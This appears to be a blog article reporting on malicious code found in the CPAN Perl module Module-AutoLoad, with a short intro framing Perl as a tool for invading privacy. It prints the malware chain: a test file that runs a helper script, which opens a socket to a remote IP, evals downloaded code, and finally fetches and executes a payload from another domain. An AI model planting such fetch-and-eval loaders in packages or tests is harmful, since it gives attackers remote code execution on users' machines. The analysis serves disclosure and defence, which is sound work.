In this pandemic everybody around is learning or gaining something. It has already been 4 months since all of us have been to our official area for which we have make ourselves addicted to. Learning is a great tool to beat anyone around you and thus learning about some powerful computer languages like Perl is more beneficial to exploit anyone’s privacy you want to. Perl is one of the most used language by hackers nowadays because for them the most fun part is doing scripting rather than applying a logic like programming.
When you learn about a particular language, obviously you get to know about some related open source tools or projects which you can use to enhance your knowledge. If we talk about open source projects for Perl, there is an open source project named CPAN which stands for Comprehensive Perl Archives Network. It is a repository of 194,565 Perl modules in 41,632 distributions. Any user can download and install these Perl modules in their devices according to their use.
Recently, researchers from Perl Foundation have observed a malicious code in one of module named Module-AutoLoad which is available for use by the user since 2011. It is the module which anyone can use with their project to automatically load CPAN modules on the fly. They don’t have to configure the dependencies on the module separately. Let’s see where actually is the malicious code actions in this module.
MALICIOUS CODE INSIDE THE MODULE
The malicious elements was found in the 05_rcx.t inside the package. The code inside this file looks something like:
#!perl
# 10_rcx.t - Test RCX functionality
use Test::More tests => 3;
use strict;
use warnings;
my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;
ok($try =~ /loaded/, "load");
ok($try =~ /drawn/, "compile");
ok($try =~ /dropped/, "method");
As we can see, this above code led to the execution of a script named script ../contrib/RCX.pl. The script for which something looks like this:
#!/usr/bin/perl -w
# Program: RCX.pl
# Purpose: Test RCX Obfuscation Framework
use strict;
use IO::Socket;
use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};
use sword;
drop sword;
exit 0;
The IP address in the above script 82.46.99.88 corresponds to the http://r.cx which loads some another obfuscated script from the server in the system. This script which is then loaded in the system is found to establish a connection with the another domain name www.limera1n.com to install iphone jailbreak or some kind of rootkit into the system.The obfuscated script:
$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1"; print <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE.150B=W<N;&EM97)A,6XN8V]M.C@P(GTB1T54("]I2F%I;$)RH96%K#0HB.V5V86P\)&(^;W(@<F5T=7)N('=A<FXD0'=H:6QE)&([,0}
if 0; # not running under some shell
use base qw(Exporter);
our @EXPORT=qw(botstrap);
$b->SUPER::expand;
# IP Bait HOP no. 47 : RCX Framework - 2001-0
After unpacking the final code which is then executed is:
print{$b=new IO::Socket::INET"www.limera1n.com:80"}"GET /iJailBreak
";eval<$b>or return warn$@while$b;1
CONCLUSION
The above said malicious package has been removed from the Perl Authors Upload Server and the developer account has been locked by the moderators. The organization also said that there are not many downloads of this module. On a concluding statement of being delivering malicious content through modules, the developer told the organization that the script which is being executed is non-malicious and that of string iJailBreak which is then called remotely is just for having fun.
